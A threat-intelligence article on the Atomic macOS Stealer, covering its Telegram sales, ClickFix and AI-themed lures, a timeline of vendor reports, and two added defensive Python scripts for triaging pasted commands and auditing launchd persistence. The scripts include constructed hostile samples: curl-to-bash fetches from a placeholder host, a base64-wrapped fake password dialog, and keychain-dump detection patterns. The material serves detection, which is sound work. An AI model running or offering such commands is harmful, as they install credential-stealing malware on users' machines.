Atomic macOS Stealer expands via Telegram MaaS and ClickFix social engineering
Atomic macOS Stealer (AMOS) has become a leading macOS infostealer, sold as malware-as-a-service on Telegram and deployed in campaigns that rely on social engineering rather than exploits. Researchers have seen the Golang-based malware distributed as malicious DMG installers and through ClickFix-style lures that trick users into pasting commands into Terminal. Once running, it captures or validates the victim's macOS password and then steals Keychain contents, browser credentials, cookies, autofill data, files, Apple Notes, extension storage, session tokens, system information and cryptocurrency wallet data, exfiltrating the results to attacker-controlled infrastructure and, in earlier observed versions, to Telegram. Operators have advertised AMOS for $1,000 per month with add-ons such as a victim panel, crypto tooling and installer support.
Sophos said AMOS accounted for nearly 40% of its macOS protection updates in 2025 and almost half of the recent macOS stealer cases seen by its customers, underscoring the malware's scale and persistence. In one investigated intrusion, a bootstrap script fetched from sphereou[.]com downloaded a second-stage payload, performed anti-analysis checks, registered with command-and-control and, after obtaining elevated access, established persistence through a LaunchDaemon. Earlier reporting tied AMOS infrastructure to amos-malware[.]ru, with exfiltration to a /sendlog endpoint; newer variants increasingly use AI-themed lures, fake installers, cracked apps, repeated password prompts and fake Ledger and Trezor modules to broaden credential theft and cryptocurrency targeting.
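A triage helper for the ClickFix step described above, added here as an example and not code from Sophos, Cyble or the AMOS operators. It scores a pasted Terminal one-liner for the behaviours the reports describe (fetching a remote script straight into a shell, base64-decoding into a shell, a fake password prompt, quarantine-attribute removal, launchd and Keychain access) and peels off embedded base64 layers before rescanning, since ClickFix lures often hide the real command inside an encoded blob. The osascript "hidden answer" dialog and dscl -authonly patterns are common macOS implementations of the password prompt and validation the reports mention and are included as assumptions rather than taken from the page; the indicator table, weights, thresholds and sample commands (including the example.invalid host) are constructed for this example and are not observed indicators.

```python
"""Score a pasted ClickFix-style Terminal command for AMOS-like behaviour.

Added example; the indicator table, weights and thresholds are assumptions,
and the sample commands (including example.invalid) are constructed.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field

# (name, pattern, weight). Weights and thresholds are assumptions for this demo.
INDICATORS = [
    ("remote_fetch_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b"), 3),
    ("base64_decode_to_shell",
     re.compile(r"base64\s+(-d|-D|--decode)\b[^|;]*\|\s*(ba|z)?sh\b"), 3),
    ("eval_of_decoded_data", re.compile(r"\beval\b.*base64"), 2),
    # Fake password prompt: an AppleScript dialog that hides what is typed.
    ("osascript_password_dialog",
     re.compile(r"osascript.*display dialog.*hidden answer", re.I), 3),
    # Password validation against the local directory service.
    ("dscl_password_validation", re.compile(r"\bdscl\b.*-authonly"), 2),
    # Stripping the quarantine attribute sidesteps Gatekeeper prompts.
    ("quarantine_removal",
     re.compile(r"\bxattr\b.*(-c\b|com\.apple\.quarantine)"), 2),
    ("launchd_plist_write", re.compile(r"/Library/Launch(Agents|Daemons)/"), 2),
    ("keychain_access",
     re.compile(r"\bsecurity\b.*(dump-keychain|find-(generic|internet)-password)"), 2),
    ("staging_in_temp", re.compile(r"/(private/)?(tmp|var/tmp)/|/Users/Shared/"), 1),
]
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_embedded_base64(cmd: str) -> list[str]:
    """Return the text of every long base64 blob in cmd that decodes to clean text."""
    layers = []
    for m in B64_BLOB.finditer(cmd):
        blob = m.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            text = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\n\t" for c in text):
            layers.append(text)
    return layers


@dataclass
class Triage:
    score: int = 0
    hits: list[str] = field(default_factory=list)
    decoded_layers: list[str] = field(default_factory=list)

    @property
    def verdict(self) -> str:
        if self.score >= 5:
            return "likely-malicious"
        if self.score >= 2:
            return "suspicious"
        return "benign-looking"


def triage_command(cmd: str, depth: int = 3) -> Triage:
    """Scan cmd, decode embedded base64 and rescan, up to `depth` layers deep."""
    result = Triage()
    layers = [cmd]
    for _ in range(depth):
        next_layers = []
        for layer in layers:
            for name, pattern, weight in INDICATORS:
                if name not in result.hits and pattern.search(layer):
                    result.hits.append(name)
                    result.score += weight
            for decoded in decode_embedded_base64(layer):
                result.decoded_layers.append(decoded)
                next_layers.append(decoded)
        if not next_layers:
            break
        layers = next_layers
    return result


# Constructed samples; example.invalid is a placeholder, not an observed host.
_INNER = (b"curl -s https://example.invalid/s | bash; "
          b"osascript -e 'display dialog \"macOS needs your password\" "
          b"default answer \"\" with hidden answer'")
SAMPLES = {
    "clickfix_curl": 'echo "Fixing..."; curl -fsSL https://example.invalid/fix.sh | bash',
    "clickfix_b64": "echo " + base64.b64encode(_INNER).decode() + " | base64 -d | bash",
    "benign": "brew update && brew upgrade",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        t = triage_command(cmd)
        print(f"{name}: {t.verdict} (score {t.score}) hits={t.hits}")
```

A lone curl-into-shell scores only "suspicious" on purpose: legitimate installers use the same idiom, so the verdict is driven by the combination with a hidden-answer password dialog, a decode-to-shell wrapper, or a drop into a staging directory, which is what distinguishes the AMOS chain from a routine install script.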

How this story unfolded
9 events from the most recent confirmed update back to the earliest known activity.
Sophos reports AMOS remains a major macOS threat in 2025
Sophos said AMOS accounted for nearly 40% of its macOS protection updates in 2025 and almost half of recent macOS stealer customer reports. The company highlighted the malware's continued reliance on social engineering themes such as fake installers, cracked apps, AI-themed lures, and repeated password prompts.
Sophos investigates ClickFix-delivered AMOS variant
Sophos MDR investigated a macOS intrusion in which a ClickFix-style social engineering lure tricked a user into running a malicious Terminal command that installed an AMOS variant. The staged infection chain included password capture and validation, second-stage payload retrieval, anti-analysis checks, data theft, exfiltration, C2 registration, and persistence via a LaunchDaemon.
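A hunting script for the LaunchDaemon persistence mentioned in this event, added here as an example and not code from Sophos or the malware. It parses launchd property lists and flags the combinations a responder would pull first: an Apple-style label installed outside the system launchd directories, a program or argument under a user-writable staging directory, an interpreter running an inline script, and RunAtLoad combined with KeepAlive. The heuristics, directory lists and the two sample plists are constructed assumptions, not indicators from the Sophos case.

```python
"""Flag launchd property lists with AMOS-style persistence traits.

Added example; the heuristics, path lists and the sample plists are
constructed assumptions, not indicators from any published case.
"""
from __future__ import annotations

import plistlib
from pathlib import Path

# Apple's own jobs live here; a com.apple.* label anywhere else is worth a look.
APPLE_PLIST_DIRS = ("/System/Library/LaunchDaemons/", "/System/Library/LaunchAgents/")
# User-writable locations a stager can drop a payload into without admin rights.
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/Shared/")
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "perl"}


def audit_plist(path: str, data: bytes) -> list[str]:
    """Return reasons a launchd plist looks suspicious; an empty list means clean."""
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # InvalidFileException or an XML parser error
        return [f"unparseable plist ({exc.__class__.__name__})"]
    reasons: list[str] = []
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    prog = str(plist.get("Program") or (args[0] if args else ""))
    if label.startswith("com.apple.") and not path.startswith(APPLE_PLIST_DIRS):
        reasons.append(f"Apple-style label {label!r} outside the system launchd directories")
    if any(d in s for d in STAGING_DIRS for s in [prog, *args]):
        reasons.append("program or arguments reference a user-writable staging directory")
    if Path(prog).name in INTERPRETERS and "-c" in args:
        reasons.append(f"{prog} -c runs an inline script from launchd")
    if plist.get("RunAtLoad") and plist.get("KeepAlive") and reasons:
        reasons.append("RunAtLoad with KeepAlive: starts at boot and restarts if killed")
    return reasons


def audit_directory(directory: str) -> dict[str, list[str]]:
    """Audit every .plist in a launchd directory; keys are paths with findings."""
    findings = {}
    for p in sorted(Path(directory).glob("*.plist")):
        reasons = audit_plist(str(p), p.read_bytes())
        if reasons:
            findings[str(p)] = reasons
    return findings


# Constructed sample plists (not observed artifacts).
SAMPLES = {
    "com.apple.systemupdate": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.systemupdate</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string><string>-c</string>
    <string>/Users/Shared/.update/agent</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>
""",
    "com.example.helper": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>Program</key><string>/Library/PrivilegedHelperTools/com.example.helper</string>
  <key>RunAtLoad</key><true/>
</dict></plist>
""",
}

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in SAMPLES.items():
            Path(tmp, f"{name}.plist").write_bytes(data)
        for path, reasons in audit_directory(tmp).items():
            print(path)
            for reason in reasons:
                print("  -", reason)
```

On a live host, point audit_directory at /Library/LaunchDaemons and /Library/LaunchAgents (and each user's ~/Library/LaunchAgents) and compare against the output of launchctl list; a plist that launchd is running but that the audit cannot explain by a known vendor is the one to image before anything is removed.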
Field Effect detects AMOS delivered via Cursor AI agent session
Field Effect reported an Atomic macOS Stealer infection chain delivered through a Cursor AI agent session, adding a new AI-themed delivery vector for the macOS stealer. The finding expands known AMOS distribution methods beyond cracked apps, ChatGPT-sharing lures, and ClickFix-style social engineering.
LevelBlue links AMOS ecosystem growth to MioLab
LevelBlue SpiderLabs reported that MioLab was building a broader macOS stealer ecosystem centered on Atomic macOS Stealer, adding attribution and operator context to prior reporting, which had covered AMOS sales and delivery tactics but not the structure behind the malware.
AMOS campaigns abuse ChatGPT chat-sharing links as a lure
Kaspersky reported that Atomic macOS Stealer was being distributed through campaigns that piggyback on ChatGPT's chat-sharing feature, adding another social-engineering lure for macOS users alongside the fake installers, cracked apps and ClickFix-style methods already documented.
Trend Micro analyzes AMOS campaign delivered through cracked apps
Trend Micro published an MDR analysis of an Atomic macOS Stealer campaign that reached macOS users through cracked applications, a delivery vector distinct from the Telegram sales, ChatGPT-themed lures and ClickFix-based infections documented elsewhere in this timeline.
AMOS upgraded with new backdoor for persistence
Reporting said Atomic macOS Stealer was updated with a backdoor component designed to maintain persistence on infected Macs, a change to the malware itself rather than to its delivery lures.
Cyble publishes technical analysis of AMOS stealer
Cyble Research and Intelligence Labs analyzed an AMOS sample distributed as a DMG file that used a fake password prompt to steal the macOS password, Keychain data, browser credentials, files, system information, and cryptocurrency wallet data. The report identified C2 infrastructure at amos-malware[.]ru and noted exfiltration to both the C2 server and Telegram.
Atomic macOS Stealer is advertised for sale on Telegram
Cyble reported that Atomic macOS Stealer (AMOS), a Golang-based macOS information stealer, was being marketed on Telegram as a malware-as-a-service offering for $1,000 per month. The operator advertised supporting services including a victim panel, MetaMask brute-forcing, a crypto checker, and a DMG installer.
Sources
Why AMOS matters: The macOS malware stealing data at scale | SOPHOS (sophos.com)
Field Effect detects AMOS Stealer delivered via Cursor AI agent session (fieldeffect.com)
"Say My Name": How MioLab is building MacOS Stealer Empire (levelblue.com)
New AMOS Infection Vector Highlights Risks around AI Adoption (kroll.com)
An MDR Analysis of the AMOS Stealer Campaign Targeting macOS via Cracked Apps | Trend Micro (ES) (trendmicro.com)
Atomic macOS Info-Stealer Upgraded With New Backdoor to Maintain Persistence (cybersecuritynews.com)
New Atomic MacOS Stealer For Sale On Telegram (blog.cyble.com)


